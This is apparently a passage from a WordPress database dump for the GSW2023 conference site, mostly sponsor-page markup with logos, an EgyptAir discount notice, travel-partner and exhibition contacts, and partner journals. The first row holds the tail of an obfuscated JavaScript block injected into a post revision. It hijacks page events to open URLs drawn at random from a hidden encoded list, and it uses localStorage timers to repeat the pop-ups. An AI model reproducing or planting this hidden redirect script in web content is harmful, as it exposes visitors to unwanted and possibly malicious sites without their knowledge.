_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:24:42','2023-08-16 00:24:42','',3066,'https://gsw2023.com/?p=5247',0,'revision','',0),
(5248,1,'2023-08-16 00:25:06','2023-08-16 00:25:06','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145399802{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition 